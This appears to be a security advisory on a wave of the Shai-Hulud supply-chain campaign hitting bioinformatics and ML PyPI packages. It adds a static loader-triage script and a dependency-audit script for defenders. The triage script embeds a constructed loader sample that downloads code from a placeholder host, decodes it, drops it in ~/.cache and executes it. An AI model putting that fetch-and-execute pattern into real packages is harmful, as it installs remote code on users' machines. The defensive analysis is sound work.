A second wave of the Shai-Hulud supply chain campaign struck approximately 29 bioinformatics and machine learning Python packages on PyPI, introducing a new loader-and-payload split evasion architecture and shifting the campaign’s targeting from software developer tooling to scientific research communities. The total package count across the campaign has passed 100, with 471 malicious artifact versions identified.
The June 8 Hades Wave: 29 Bioinformatics and ML PyPI Packages Compromised
The June 8 wave deployed a variant of the campaign’s PyPI-targeting malware designated Hades — distinct from the earlier Miasma variant that attacked npm packages. Where the first campaign waves targeted developer tools including Red Hat npm packages and Azure tooling packages, the Hades wave specifically selected packages used by genomics researchers, computational biologists, and machine learning scientists. The pivot to bioinformatics marks a deliberate expansion of the campaign’s target community rather than a continuation of earlier developer-focused activity.
Security researchers tracking the campaign identified approximately 29 compromised bioinformatics and ML packages in the June 8 wave. Because the malicious releases were published as new versions of existing packages, they appear in ordinary PyPI searches and are resolved by pip like any other release; the malicious code is embedded in the package itself so that it runs at install time or when the package is imported.
Loader-and-Payload Split Architecture: How Hades Evades Detection Differently
Previous waves of the Shai-Hulud campaign bundled the malicious payload within the compromised package itself, a single-artifact approach that static analysis and behavioral scanning tools had begun to detect. The June 8 Hades wave introduced a new architecture: the loader and the payload are split across separate locations on the filesystem rather than co-located in the package artifact. Examining the malicious package in isolation therefore reveals only the loader, not the full payload. Detection tools that analyze individual package contents without tracing the loader's subsequent filesystem writes or its dynamic retrieval of the payload are less likely to identify the full malicious capability from the initial artifact alone.
The architectural shift demonstrates that the Shai-Hulud campaign operators are actively adapting their evasion approach in response to detection, which is characteristic of a campaign with continued operational goals rather than a one-time opportunistic wave.
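The triage heuristic below is an added example, not the campaign's code or any vendor's detection logic, and the two source files it inspects are constructed. It shows what a single-artifact scanner can still extract from a split loader: the payload is absent, but the primitives that fetch or decode bytes, drop them outside the package tree, and hand them to exec or compile are not, and their co-occurrence in setup.py or __init__.py is what should trigger dynamic follow-up.

```python
"""Static triage of a Python package's install-time or import-time code for
two-stage loader indicators.  Added example, not the campaign's code and not
any vendor's detection logic; the two source files below are constructed.

A split loader rarely contains its payload, but it does have to fetch or
decode bytes, drop them somewhere outside the package tree, and hand them to
exec/compile.  Counting those primitives is a cheap first filter.
"""
import ast

EXEC_SINKS = {"exec", "eval", "compile"}
FETCH_CALLS = {"urlopen", "urlretrieve", "get", "request"}      # urllib / requests-style
DECODE_CALLS = {"b64decode", "a85decode", "decompress", "unhexlify"}
FILE_IO_CALLS = {"open", "write_bytes", "write_text", "copyfile", "move"}
# Path literals a package has no business writing to during install or import.
OUTSIDE_TREE_PREFIXES = ("~/", "/tmp", "/var/tmp", "/dev/shm", "%APPDATA%", "%LOCALAPPDATA%")


def _call_name(node: ast.Call) -> str:
    """Trailing identifier of the call target: urllib.request.urlopen(...) -> 'urlopen'."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def triage_source(source: str) -> dict[str, int]:
    """Count loader indicators in one Python source file."""
    tree = ast.parse(source)
    hits = {"exec_sink": 0, "fetch": 0, "decode": 0, "file_io": 0, "outside_path_literal": 0}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in EXEC_SINKS:
                hits["exec_sink"] += 1
            elif name in FETCH_CALLS:
                hits["fetch"] += 1
            elif name in DECODE_CALLS:
                hits["decode"] += 1
            elif name in FILE_IO_CALLS:
                hits["file_io"] += 1
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith(OUTSIDE_TREE_PREFIXES):
                hits["outside_path_literal"] += 1
    return hits


def is_loader_like(hits: dict[str, int]) -> bool:
    """Flag code that executes something it fetched, decoded, or dropped outside the tree.
    A bare exec() or a bare ~/.cache write is common in legitimate packages; the
    combination is what matters."""
    staged = hits["fetch"] or hits["decode"] or hits["outside_path_literal"]
    return bool(hits["exec_sink"] and staged)


# Constructed samples (not real package code).
BENIGN_SETUP = '''
from setuptools import setup
setup(name="seqtools", version="1.2.0", packages=["seqtools"])
'''

LOADER_LIKE_INIT = '''
import base64, os, urllib.request
def _stage():
    blob = urllib.request.urlopen("http://example.invalid/s2").read()
    dest = os.path.expanduser("~/.cache/.s2.py")
    with open(dest, "wb") as fh:
        fh.write(base64.b64decode(blob))
    exec(compile(open(dest).read(), dest, "exec"))
_stage()
'''

if __name__ == "__main__":
    for label, src in (("setup.py", BENIGN_SETUP), ("__init__.py", LOADER_LIKE_INIT)):
        hits = triage_source(src)
        print(label, hits, "LOADER-LIKE" if is_loader_like(hits) else "ok")
```

Treat a hit as a reason to install the package in an instrumented sandbox and record its network activity and filesystem writes; the static pass cannot see the payload by design, and an obfuscated loader (string concatenation, getattr lookups, aliased imports) will slip past these name matches.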
From Developer Tooling to Scientific Research: The Shai-Hulud Campaign’s Target Expansion
The first Shai-Hulud waves targeted software developers — a community that regularly installs packages from npm and PyPI, maintains cloud service credentials, and has API keys for development infrastructure. The June 8 pivot to bioinformatics researchers extends this credential theft objective into a different and less security-hardened community.
Bioinformatics and computational biology researchers routinely work with Python packages for genomic data processing, sequence alignment, protein structure analysis, and machine learning pipelines applied to scientific datasets. Their computing environments often include institutional high-performance computing clusters, cloud-based research pipelines funded by pharmaceutical or academic institutions, and access credentials to sequencing data repositories that may hold sensitive clinical or pre-publication research data.
Shai-Hulud Campaign Scope: 100+ Packages and 471 Malicious Artifact Versions
The June 8 wave did not emerge in isolation. The broader Shai-Hulud campaign had already compromised more than 57 npm packages in over 300 malicious versions during the Miasma wave targeting developer tools earlier in June. Combined with the bioinformatics wave, the total campaign footprint has reached more than 100 compromised packages across npm and PyPI, with 471 distinct malicious artifact versions identified. Both the Miasma npm variant and the Hades PyPI variant function as multi-stage droppers that scan the local system and connected cloud services for credentials, API keys, tokens, and secrets.
Credential Theft Targeting Cloud Services, AI Provider Keys, and Research Infrastructure
The malware’s collection behavior targets a broad category of credentials: cloud service access tokens, AI provider API keys, development authentication tokens, and any secrets accessible from the infected environment. For bioinformatics researchers, the relevant credentials extend to institutional computing cluster access, cloud storage buckets containing genomic or clinical data, and potentially API keys for AI or ML infrastructure used in research pipelines.
After collecting credentials and secrets from the infected system, both the Miasma and Hades variants exfiltrate the harvested data by publishing it to attacker-controlled GitHub repositories. That channel persists independently of the infected host, and the campaign's self-propagating design means compromised credentials may have been transmitted before the infection is identified and remediated, so any secret reachable from an affected host should be treated as exposed and rotated.
Organizations in scientific research, pharmaceutical development, and academic computing should audit Python and npm lock files in their environments, review any packages installed during the campaign's active waves, and, because a range specifier in a requirements file does not record which version actually landed, check the resolved contents of installed environments (for example, pip list output) rather than manifests alone. Research computing environments that share a single Python environment across multiple users or projects carry elevated risk: one installation of a compromised package places it in the shared dependency tree for everyone.
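As an added example of that audit (not a tool from the campaign's analysts, and with a blocklist, manifests and pip-list output that are constructed placeholders rather than the real compromised versions), the following script compares exact pins in requirements.txt, the installed set reported by pip list --format=json, and a package-lock.json against a list of known-bad versions, and reports requirement lines that cannot be audited because they are not pinned.

```python
"""Audit dependency manifests and installed environments against a list of
known-compromised package versions.  Added example: the blocklist, manifests
and pip-list output below are constructed placeholders, not the campaign's
actual package list, which you would take from the advisory you trust.
"""
import json
import re
from typing import Iterable, Iterator


def normalize_pypi(name: str) -> str:
    """PEP 503 normalization so 'Genome_Align' and 'genome-align' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def _requirement_lines(text: str) -> Iterator[str]:
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line and not line.startswith("-"):   # skip blanks, comments, -r/-e/--index-url
            yield line


def parse_requirements(text: str) -> Iterator[tuple[str, str]]:
    """Yield (name, version) for exact '==' pins in a requirements.txt."""
    for line in _requirement_lines(text):
        m = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([^\s;]+)", line)
        if m:
            yield normalize_pypi(m.group(1)), m.group(2)


def unpinned_requirements(text: str) -> list[str]:
    """Names without an exact pin: the file cannot tell you which version landed,
    so the resolved environment has to be audited instead."""
    names = []
    for line in _requirement_lines(text):
        m = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)", line)
        if m and "==" not in line:
            names.append(normalize_pypi(m.group(1)))
    return names


def parse_pip_list(text: str) -> Iterator[tuple[str, str]]:
    """Output of `pip list --format=json`, run inside each (shared) environment."""
    for entry in json.loads(text):
        yield normalize_pypi(entry["name"]), entry["version"]


def parse_package_lock(text: str) -> Iterator[tuple[str, str]]:
    """package-lock.json v2/v3: 'packages' is keyed by install path; the root is ''."""
    for path, meta in json.loads(text).get("packages", {}).items():
        if path:
            yield path.rsplit("node_modules/", 1)[-1], meta["version"]


def audit(entries: Iterable[tuple[str, str]], blocklist: dict[str, set[str]]) -> list[tuple[str, str]]:
    """Return the (name, version) pairs that match a known-compromised release."""
    return sorted((n, v) for n, v in entries if v in blocklist.get(n, set()))


# Constructed blocklist: hypothetical names and versions, NOT the real list.
PYPI_BLOCKLIST = {"genome-align": {"2.4.1", "2.4.2"}, "protfold-ml": {"0.9.7"}}
NPM_BLOCKLIST = {"@example/azure-helper": {"3.1.0"}}

# Constructed inputs.
REQUIREMENTS = """
numpy==1.26.4
Genome_Align==2.4.2      # exact pin on a compromised release
protfold-ml>=0.9         # range: cannot be audited from the file alone
"""
PIP_LIST = json.dumps([
    {"name": "numpy", "version": "1.26.4"},
    {"name": "genome-align", "version": "2.4.2"},
    {"name": "protfold-ml", "version": "0.9.7"},
])
PACKAGE_LOCK = json.dumps({
    "name": "pipeline", "lockfileVersion": 3,
    "packages": {
        "": {"name": "pipeline", "version": "1.0.0"},
        "node_modules/@example/azure-helper": {"version": "3.1.0"},
        "node_modules/left-pad": {"version": "1.3.0"},
    },
})

if __name__ == "__main__":
    print("requirements.txt:", audit(parse_requirements(REQUIREMENTS), PYPI_BLOCKLIST))
    print("unpinned (audit the env instead):", unpinned_requirements(REQUIREMENTS))
    print("pip list:", audit(parse_pip_list(PIP_LIST), PYPI_BLOCKLIST))
    print("package-lock.json:", audit(parse_package_lock(PACKAGE_LOCK), NPM_BLOCKLIST))
```

Run the pip-list check inside every shared environment on a cluster login node or research VM, not just against the manifests in version control: the compromise lives in the installed site-packages, and the unpinned protfold-ml line above is exactly the case where the manifest looks clean while the environment is not.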
